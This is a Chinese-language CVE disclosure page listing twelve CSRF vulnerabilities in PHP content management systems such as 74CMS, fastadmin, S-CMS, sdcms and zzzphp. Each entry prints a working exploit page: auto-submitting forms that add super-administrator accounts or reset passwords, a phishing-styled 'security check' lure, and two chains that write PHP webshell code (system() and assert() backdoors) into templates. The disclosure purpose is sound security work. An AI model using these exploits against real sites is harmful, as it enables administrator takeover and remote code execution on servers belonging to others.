CVE中文申请站

CVE-2019-11374:骑士74CMS v5.0.1后台管理页面存在CSRF漏洞

一、漏洞摘要

漏洞名称: 骑士74CMS v5.0.1后台管理页面存在CSRF漏洞
上报日期: 2019-04-14
漏洞发现者: ax8
产品首页: http://www.74cms.com/
软件链接: http://www.74cms.com/download/index.html
版本: v5.0.1
CVE编号: CVE-2019-11374


二、漏洞概述

登陆后台管理页面如下,可以添加管理员
1.png
输入信息点击添加
2.png
抓取数据包如下
3.png
测试发现其存在CSRF漏洞,管理员登陆后台管理界面后,点击hacker发来的如下链接,即可创建一个新的超级管理员用户
4.png

三、利用代码

exp代码如下:

<!--poc.html(creat a administrater)-->
<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">
      <input type="hidden" name="username" value="hacker1" />
  <input type="hidden" name="email" value="111111111@qq.com" />
      <input type="hidden" name="password" value="hacker1" />
      <input type="hidden" name="repassword" value="hacker1" />  
  <input type="hidden" name="role_id" value="1" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/203/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11374
exploit-db:发布中

CVE-2019-11375:MSVOD V10后台管理页面存在CSRF漏洞

一、漏洞摘要

漏洞名称: MSVOD V10后台管理页面存在CSRF漏洞
上报日期: 2019-04-14
漏洞发现者: ax8
产品首页: https://www.msvod.cc/
软件链接: https://www.msvodx.com/
版本: v10
CVE编号: CVE-2019-11375


二、漏洞概述

使用演示网站进行漏洞复现。如下进入模板风格-4演示站后台
1.png
进入会员管理页面
2.png
任意修改一个用户信息,抓包如下
3.png
尝试repeater发现其未对Refer字段进行检测,也没有使用token验证,存在CSRF漏洞。管理员登陆后台后,访问hacker发来的如下页面,可以实现任意修改会员账号、密码、金币、到期时间等信息。
4.png


三、利用代码

exp代码如下:

<!--poc.html(change user infomation)-->
<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">
      <input type="hidden" name="username" value="hacker1" />
  <input type="hidden" name="nickname" value="hacker1" />
  <input type="hidden" name="email" value="hacker1" />
  <input type="hidden" name="tel" value="hacker1" />
      <input type="hidden" name="password" value="hacker1" />
      <input type="hidden" name="out_time" value="1970-01-01" />  
  <input type="hidden" name="money" value="30" />
  <input type="hidden" name="is_permanent" value="0" />
  <input type="hidden" name="status" value="1" />
  <input type="hidden" name="id" value="821" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/198/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11375
exploit-db:发布中

CVE-2019-11077:fastadmin V1.0.0.20190111_beta存在CSRF漏洞

一、漏洞摘要

漏洞名称: fastadmin V1.0.0.20190111_beta存在CSRF漏洞
上报日期: 2019-04-08
漏洞发现者: Yu Yang
产品首页: https://www.fastadmin.net
软件链接: https://www.fastadmin.net
版本: V1.0.0.20190111_beta
CVE编号: CVE-2019-11077


二、漏洞概述

在登录管理员后台后发现可以添加管理员用户
1.png
添加管理员正常的流程如下
2.png
下面为添加用户过程中的抓包的报文,可以看见没有csrf_token等防护措施
3.png
根据这些所得到的信息,我们就可以伪造html表单,并欺骗管理员点击,最后达到添加管理员用户的目的

三、利用代码

   <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.242.128/fastadmin/public/admin/auth/admin/add?dialog=1" method="POST">
      <input type="hidden" name="group&#91;&#93;" value="1" />
      <input type="hidden" name="row&#91;username&#93;" value="admin1" />
      <input type="hidden" name="row&#91;email&#93;" value="test&#64;test&#46;com" />
      <input type="hidden" name="row&#91;nickname&#93;" value="admin1" />
      <input type="hidden" name="row&#91;password&#93;" value="admin1" />
      <input type="hidden" name="row&#91;status&#93;" value="normal" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

模拟管理员点击伪造的页面 ,查看效果
4.png
页面跳转后,发现管理员用户添加成功
5.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/191/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11077
exploit-db:发布中

CVE-2019-11078:MKCMS V5.0存在CSRF漏洞

一、漏洞摘要

漏洞名称: MKCMS V5.0存在CSRF漏洞
上报日期: 2019-04-04
漏洞发现者: cisk
产品首页: https://micool.net/1090.html
软件链接: https://www.lanzous.com/i2ipcre
版本: V5.0
CVE编号: CVE-2019-11078


二、漏洞概述

CSRF: ucenter/userinfo.php
post请求中没有带token,也没有验证Referer,导致产生csrf漏洞
6.png

三、利用方法

构造如下poc.html,并访问poc.html;将修改lduo123账号的密码

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://v.micool.top/ucenter/userinfo.php" method="POST">
      <input type="hidden" name="u&#95;name" value="lduo123" />
      <input type="hidden" name="u&#95;password" value="123456" />
      <input type="hidden" name="u&#95;phone" value="1314520" />
      <input type="hidden" name="u&#95;qq" value="" />
      <input type="hidden" name="u&#95;email" value="admin&#64;gmail&#46;com" />
      <input type="hidden" name="save" value="" />
      <input type="submit" value="Submit request" />
    </form>    
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/193/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11078
exploit-db:发布中

CVE-2019-10237:S-CMS学校建站系统PHP版V1.0存在CSRF漏洞

一、漏洞摘要

漏洞名称: S-CMS学校建站系统PHP版V1.0存在CSRF漏洞
上报日期: 2019-03-22
漏洞发现者: Liu Ze Yan , Wang Chi Heng ,Yu Fen , Xie Chao Qi
产品首页: https://www.s-cms.cn/download.html?code=php
软件链接: https://www.s-cms.cn/download.html?code=php
版本: PHP v1.0
CVE编号: CVE-2019-10237


二、漏洞概述

正常情况下,顶级管理员在登录后,可以进入到【账号管理】中,进行添加管理员
1.png
2.png
上面是正常的界面管理员添加界面。填写好相关数据后,管理员正常进行添加。然后我们看看抓取到的数据。
3.png
下图为顶级管理员添加的请求包:
可以看到,请求头中记录了关于URL,请求方法,以及表单值等重要的信息,并且是明文显示。
4.png
5.png

这就给攻击者制造了CSRF欺骗的条件,我们可以根据根据这些值进行html页面伪造,并且诱骗网站管理员进行点击,从而达到添加属于新管理员的目的

三、利用代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Your account is at risk of being stolen.  Please change your password as soon as possible.</title>
</head>
  <body style="background-color:PowderBlue;">
               <h1>Your account is at risk of being stolen. </h1>
               <p style="font-family:verdana;color:red">Please change your password as soon as possible.</p>
               <p style="font-family:times;color:green">This product provides a key maintenance system.</p>

               <p style="font-size:30px">Please click the button below to check account security.</p>             
<form action="http://192.168.43.89/4.edu.php/admin/ajax.php?type=admin&action=add&lang=0" method="POST" id="transfer" name="transfer">
       <input type="hidden" name="A_login" value="admin2">
      <input type="hidden" name="A_pwd" value="123456">
      <input type="hidden" name="A_type" value="admin">
      <input type="hidden" name="A_a0" value="1">
             <input type="hidden" name="A_a1" value="1">
             <input type="hidden" name="A_a2" value="1">
             <input type="hidden" name="A_a3" value="1">
             <input type="hidden" name="A_a4" value="1">
             <input type="hidden" name="A_a5" value="1">
             <input type="hidden" name="A_a6" value="1">
             <input type="hidden" name="A_a8" value="1">
             <input type="hidden" name="A_a10" value="1">
             <input type="hidden" name="A_a7" value="1">
             <input type="hidden" name="A_a9" value="1">
             <input type="hidden" name="A_a11" value="1">
             <input type="hidden" name="A_textauth[]" value="13">
             <input type="hidden" name="A_textauth[]" value="13">
             <input type="hidden" name="A_textauth[]" value="14">
             <input type="hidden" name="A_textauth[]" value="2">
             <input type="hidden" name="A_textauth[]" value="1">
             <input type="hidden" name="A_textauth[]" value="all">
             <input type="hidden" name="A_newsauth[]" value="7">
             <input type="hidden" name="A_newsauth[]" value="1">
             <input type="hidden" name="A_newsauth[]" value="108">
             <input type="hidden" name="A_newsauth[]" value="104">
             <input type="hidden" name="A_newsauth[]" value="113">
             <input type="hidden" name="A_newsauth[]" value="112">
             <input type="hidden" name="A_newsauth[]" value="109">
             <input type="hidden" name="A_newsauth[]" value="106">
             <input type="hidden" name="A_newsauth[]" value="105">
             <input type="hidden" name="A_newsauth[]" value="110">
             <input type="hidden" name="A_newsauth[]" value="all">
             <input type="hidden" name="A_productauth[]" value="8">
             <input type="hidden" name="A_productauth[]" value="7">
             <input type="hidden" name="A_productauth[]" value="4">
             <input type="hidden" name="A_productauth[]" value="3">
             <input type="hidden" name="A_productauth[]" value="2">
             <input type="hidden" name="A_productauth[]" value="all">
             <input type="hidden" name="A_formauth[]" value="9">
             <input type="hidden" name="A_formauth[]" value="8">
             <input type="hidden" name="A_formauth[]" value="7">
             <input type="hidden" name="A_formauth[]" value="all">
             <input type="hidden" name="A_bbsauth[]" value="1">
             <input type="hidden" name="A_bbsauth[]" value="all">
<button type="submit" value="Submit">Click to enter the security check</button>
      </form>
  </body>
</html>

这是构造好的页面效果
6.png
已经登录的管理员点击按钮后就会触发添加账户和修改账户权限的操作。
7.png
后台可以看到已经被添加了一个admin账户并且拥有了所有权限
8.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/172/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10237
exploit-db:发布中

CVE-2019-9652:sdcms V1.7 后台csrf漏洞

一、漏洞摘要

漏洞名称: sdcms V1.7 后台csrf漏洞
上报日期: 2019-03-04
漏洞发现者: Yang.X
产品首页: https://www.sdcms.cn/
软件链接: https://www.sdcms.cn/down-109.html
版本: 1.7
CVE编号: CVE-2019-9652


二、漏洞概述

整站后台请求没有加上csrf token保护,所以可以伪造客户端请求。 配合后台代码执行漏洞(http://www.iwantacve.cn/index.php/archives/155/),即可getshell。

三、利用方法

将以下代码保存为html文件,放在网站上,将网址发给管理员,在管理登陆的情况下,点击链接即可在top.php中插入恶意代码从而getshell。
exp:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/sdcms17/?m=admin&c=theme&a=edit&root=ZGVmYXVsdC90b3AuUEhQ" method="POST">
      <input type="hidden" name="file" value="default&#47;top&#46;php" />
      <input type="hidden" name="t0" value="ZGVmYXVsdC90b3AuUEhQ" />
      <input type="hidden" name="t1" value="" />
      <input type="hidden" name="t2" value="&lt;&#63;php&#32;system&#40;&#36;&#95;SERVER&#91;&apos;HTTP&#95;USER&#95;AGENT&apos;&#93;&#41;&#59;&#32;&#63;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/156/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9652
exploit-db:发布中

CVE-2019-9182:zzzphp V1.6.1 后台csrf漏洞

一、漏洞摘要

漏洞名称: zzzphp V1.6.1 后台csrf漏洞
上报日期: 2019-02-22
漏洞发现者: Yang Chenglong
产品首页: http://www.zzzcms.com/index.html
软件链接: http://115.29.55.18/zzzphp.zip
版本: 1.6.1
CVE编号: CVE-2019-9182


二、漏洞概述

整站后台请求没有加上csrf token保护,所以可以伪造客户端请求。 配合后台代码执行漏洞(http://www.iwantacve.cn/index.php/archives/118/),即可getshell。

三、利用方法

将以下代码保存为html文件,放在网站上,将网址发给站长,在站长登陆的情况下,点击链接即可在search.html模版中插入恶意代码从而getshell。

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">

      <input type="hidden" name="file" value="&#47;zzzphp&#47;template&#47;pc&#47;cn2016&#47;html&#47;search&#46;html" />

      <input type="hidden" name="filetext" value="&#123;if&#58;assert&#40;&#36;&#95;POST&#91;x&#93;&#41;&#125;phpinfo&#40;&#41;&#59;&#123;end&#32;if&#125;" />

      <input type="submit" value="Submit request" />

    </form>

    <script>

      document.forms[0].submit();

    </script>

  </body>

</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/119/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9182
exploit-db:发布中

CVE-2019-9040: S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号

一、漏洞摘要

漏洞名称: S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号
上报日期: 2019-02-22
漏洞发现者: qn(137535957@qq.cn)
产品首页: https://www.s-cms.cn
软件链接: https://www.s-cms.cn
版本: PHP v3.0
CVE编号: CVE-2019-9040


二、漏洞概述

恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/1.com.php/admin/ajax.php?type=admin&action=add&lang=0" method="POST">
      <input type="hidden" name="A&#95;login" value="test1" />
      <input type="hidden" name="A&#95;pwd" value="test1" />
      <input type="hidden" name="A&#95;type" value="1" />
      <input type="hidden" name="A&#95;a0" value="1" />
      <input type="hidden" name="A&#95;a1" value="1" />
      <input type="hidden" name="A&#95;a2" value="1" />
      <input type="hidden" name="A&#95;a3" value="1" />
      <input type="hidden" name="A&#95;a4" value="1" />
      <input type="hidden" name="A&#95;a5" value="1" />
      <input type="hidden" name="A&#95;a6" value="1" />
      <input type="hidden" name="A&#95;a8" value="1" />
      <input type="hidden" name="A&#95;a10" value="1" />
      <input type="hidden" name="A&#95;a7" value="1" />
      <input type="hidden" name="A&#95;a9" value="1" />
      <input type="hidden" name="A&#95;a11" value="1" />
      <input type="hidden" name="A&#95;textauth&#91;&#93;" value="all" />
      <input type="hidden" name="A&#95;productauth&#91;&#93;" value="all" />
      <input type="hidden" name="A&#95;bbsauth&#91;&#93;" value="all" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/113/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9040
exploit-db:发布中

CVE-2019-6249:Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号

一、漏洞摘要

漏洞名称: Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号
上报日期: 2019-01-13
漏洞发现者: AllenChen(520allen@gmail.com)
产品首页: http://www.hucart.com/
软件链接: http://www.hucart.com/
版本: v5.7.4
CVE编号: CVE-2019-6249


二、漏洞概述

Hucart cms v5.7.4版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加一个名为hack的管理员账号。

三、利用代码

exp代码如下:
增加一个名为hack密码为hack123的管理员账号。

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='admin@hack.com' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/109/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
exploit-db:https://www.exploit-db.com/exploits/46149

CVE-2018-18191:Finecms_v5.4存在CSRF漏洞可修改管理员账户密码

一、漏洞摘要

漏洞名称: Finecms_v5.4存在CSRF漏洞可修改管理员账户密码
上报日期: 2018-10-07
漏洞发现者: 踏月留香
产品首页: http://www.finecms.net/
软件链接: http://down.chinaz.com/soft/32596.htm
版本: 5.4
CVE编号: CVE-2018-18191


二、漏洞概述

恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member&#91;email&#93;" value="admin&#64;163&#46;com" />
      <input type="hidden" name="member&#91;name&#93;" value="admin" />
      <input type="hidden" name="member&#91;phone&#93;" value="18888888888" />
      <input type="hidden" name="member&#91;password&#93;" value="888888" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/49/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18191
exploit-db:发布中

CVE-2018-16416:FUELCMS 1.4存在CSRF可修改管理员账户密码

一、漏洞摘要

漏洞名称: FUELCMS 1.4存在CSRF可修改管理员账户密码
上报日期: 2018-08-25
漏洞发现者: 惜潮
产品首页: https://github.com/daylightstudio/FUEL-CMS
软件链接: https://github.com/daylightstudio/FUEL-CMS
版本: 1.4
CVE编号: CVE-2018-16416


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面 从而更改管理员账户密码。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
     <input type="hidden" name="user_name" value="hacker"><!--admin's name-->
     <input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
   <input type="hidden" name="first_name" value="admin">
   <input type="hidden" name="last_name" value="admin">
   <input type="hidden" name="new_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="Save" value="Save">
   <input type="hidden" name="language" value="english">
   <input type="hidden" name="fuel_inline" value="0">
    <button type="submit" value="Submit">GO</button>
    </form>
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/48/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16416
exploit-db:发布中

CVE-2018-9926:五指CMS 4.1.0存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加管理员账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9926


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

    <html><body>
    <script type="text/javascript">
    function post(url,fields)
    {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
    }
    function csrf_hack()
    {
    var fields;
    
    fields += "<input type='hidden' name='form[role][]' value='1' />";
    fields += "<input type='hidden' name='form[username]' value='hack123' />"; 
    fields += "<input type='hidden' name='form[password]' value='' />"; 
    fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />"; 
    
    var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=提交";
    post(url,fields);
    }
    window.onload = function() { csrf_hack();}
    </script>
    </body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/6/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9926
exploit-db:https://www.exploit-db.com/exploits/44439/